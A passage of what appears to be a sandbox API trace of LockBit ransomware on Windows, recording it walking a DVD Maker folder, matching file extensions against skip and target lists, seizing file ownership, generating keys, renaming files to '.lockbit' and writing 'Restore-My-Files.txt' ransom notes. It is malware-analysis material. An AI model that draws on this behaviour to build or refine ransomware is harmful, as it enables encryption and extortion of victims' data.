lpString2="15x15dot.png") returned 1 [0080.510] lstrcmpiW (lpString1="iconcache.db", lpString2="15x15dot.png") returned 1 [0080.510] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\") returned="" [0080.510] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\15x15dot.png") returned=".png" [0080.510] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0080.510] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0080.510] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0080.510] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0080.510] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0080.510] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0080.510] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0080.510] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0080.510] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0080.510] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0080.510] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0080.510] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0080.510] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0080.510] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0080.510] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0080.510] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0080.510] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0080.510] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0080.511] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0080.511] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0080.511] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0080.511] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0080.511] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0080.511] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0080.511] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0080.511] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0080.511] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0080.511] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0080.511] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\15x15dot.png.lockbit") returned 70 [0080.511] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\15x15dot.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.516] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.516] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.516] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.516] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.517] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.517] RtlFreeAnsiString (AnsiString="\\") [0080.517] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0080.517] malloc (_Size=0x200) returned 0x77d800 [0080.517] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0080.517] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.517] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.517] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\15x15dot.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.521] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\15x15dot.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.521] CloseHandle (hObject=0x3c4) returned 1 [0080.521] free (_Block=0x77d800) [0080.521] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\15x15dot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\15x15dot.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0080.521] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.521] malloc (_Size=0x40068) returned 0x1ff1e60 [0080.522] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2821) returned 1 [0080.522] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.522] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0080.522] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.523] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0080.523] ReadFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0080.527] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\15x15dot.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\15x15dot.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.527] malloc (_Size=0xa2) returned 0x77d800 [0080.527] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0080.528] free (_Block=0x77d800) [0080.528] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\15x15dot.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full") returned 1 [0080.528] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\Restore-My-Files.txt") returned 70 [0080.528] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.528] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f20ba7c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f20ba7c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d065a03, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11d3, dwReserved0=0x0, dwReserved1=0x0, cFileName="dotsdarkoverlay.png", cAlternateFileName="")) returned 1 [0080.528] lstrcmpiW (lpString1=".", lpString2="dotsdarkoverlay.png") returned -1 [0080.528] lstrcmpiW (lpString1="..", lpString2="dotsdarkoverlay.png") returned -1 [0080.528] PathFindExtensionW (pszPath="dotsdarkoverlay.png") returned=".png" [0080.528] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0080.528] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0080.528] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0080.528] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0080.528] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0080.528] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0080.528] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0080.528] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0080.529] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0080.529] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0080.529] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0080.529] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0080.529] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0080.529] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0080.529] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0080.529] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0080.529] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0080.529] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0080.529] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0080.529] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0080.529] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0080.529] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0080.529] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0080.529] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0080.529] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.529] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0080.529] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0080.529] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0080.529] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0080.529] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0080.529] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0080.530] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0080.530] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0080.530] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0080.530] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0080.530] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0080.530] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0080.530] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0080.530] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0080.530] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0080.530] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0080.530] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0080.530] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.530] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0080.530] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0080.530] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0080.530] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0080.530] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="dotsdarkoverlay.png") returned 1 [0080.530] lstrcmpiW (lpString1="ntldr", lpString2="dotsdarkoverlay.png") returned 1 [0080.530] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="dotsdarkoverlay.png") returned 1 [0080.530] lstrcmpiW (lpString1="bootsect.bak", lpString2="dotsdarkoverlay.png") returned -1 [0080.530] lstrcmpiW (lpString1="autorun.inf", lpString2="dotsdarkoverlay.png") returned -1 [0080.530] lstrcmpiW (lpString1="thumbs.db", lpString2="dotsdarkoverlay.png") returned 1 [0080.531] lstrcmpiW (lpString1="iconcache.db", lpString2="dotsdarkoverlay.png") returned 1 [0080.531] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\") returned="" [0080.531] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotsdarkoverlay.png") returned=".png" [0080.531] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0080.531] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0080.531] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0080.531] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0080.531] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0080.531] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0080.531] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0080.531] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0080.531] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0080.531] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0080.531] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0080.531] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0080.531] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0080.531] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0080.531] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0080.531] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0080.531] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0080.531] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0080.531] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0080.532] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0080.532] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0080.532] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0080.532] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0080.532] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0080.532] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0080.532] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0080.532] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0080.532] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0080.532] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotsdarkoverlay.png.lockbit") returned 77 [0080.532] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotsdarkoverlay.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\dotsdarkoverlay.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.576] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0080.582] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0080.582] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0080.582] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0080.582] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0080.582] RtlFreeAnsiString (AnsiString="\\") [0080.582] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0080.583] malloc (_Size=0x200) returned 0x77d800 [0080.583] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0080.583] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.583] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0080.583] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotsdarkoverlay.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.584] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotsdarkoverlay.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0080.584] CloseHandle (hObject=0x3c4) returned 1 [0080.584] free (_Block=0x77d800) [0080.584] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotsdarkoverlay.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\dotsdarkoverlay.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0080.584] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0080.584] malloc (_Size=0x40068) returned 0x1fb18c0 [0080.584] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=4563) returned 1 [0080.584] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.585] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.585] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0080.585] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.585] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.585] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0080.586] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.588] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotsdarkoverlay.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotsdarkoverlay.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0080.588] malloc (_Size=0xb0) returned 0x77d800 [0080.588] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xb0, FileInformationClass=0xa) returned 0x0 [0080.589] free (_Block=0x77d800) [0080.589] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotsdarkoverlay.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full") returned 1 [0080.589] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\Restore-My-Files.txt") returned 70 [0080.589] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\full\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0080.589] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f20ba7c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f20ba7c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d065a03, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x123d, dwReserved0=0x0, dwReserved1=0x0, cFileName="dotslightoverlay.png", cAlternateFileName="")) returned 1 [0080.589] lstrcmpiW (lpString1=".", lpString2="dotslightoverlay.png") returned -1 [0080.589] lstrcmpiW (lpString1="..", lpString2="dotslightoverlay.png") returned -1 [0080.589] PathFindExtensionW (pszPath="dotslightoverlay.png") returned=".png" [0080.589] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0080.590] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0080.590] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0080.590] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0080.590] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0080.590] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0080.590] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0080.590] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0080.590] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0080.590] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0080.590] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0080.590] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0080.590] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0080.590] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0080.590] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0080.590] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0080.590] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0080.590] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0080.590] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0080.590] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0080.590] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0080.591] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0080.591] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0080.591] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0080.591] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.591] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0080.591] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0080.591] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0080.591] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0080.591] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0080.591] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0080.591] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0080.591] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0080.591] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0080.591] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0080.591] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0080.591] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0080.591] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0080.591] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0080.592] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0080.592] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0080.592] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0080.592] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0080.592] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0080.592] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0080.592] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0080.592] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0080.592] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="dotslightoverlay.png") returned 1 [0080.592] lstrcmpiW (lpString1="ntldr", lpString2="dotslightoverlay.png") returned 1 [0080.592] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="dotslightoverlay.png") returned 1 [0080.592] lstrcmpiW (lpString1="bootsect.bak", lpString2="dotslightoverlay.png") returned -1 [0080.592] lstrcmpiW (lpString1="autorun.inf", lpString2="dotslightoverlay.png") returned -1 [0080.592] lstrcmpiW (lpString1="thumbs.db", lpString2="dotslightoverlay.png") returned 1 [0080.592] lstrcmpiW (lpString1="iconcache.db", lpString2="dotslightoverlay.png") returned 1 [0080.592] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\") returned="" [0080.592] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Full\\dotslightoverlay.png") returned=".png" [0080.592] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0080.593] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0080.593] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0080.593] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0080.593] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0080.593] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0080.593] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0080.593] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0080.593] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0080.593] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0080.593] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0080.593] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0080.593] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0080.593] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0080.593] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0080.593] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0080.593] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0080.593] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0080.593] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0080.594] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0080.594] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0080.594] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0080.594] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0080.594] lstrcmpiW (lpString1=".sql", 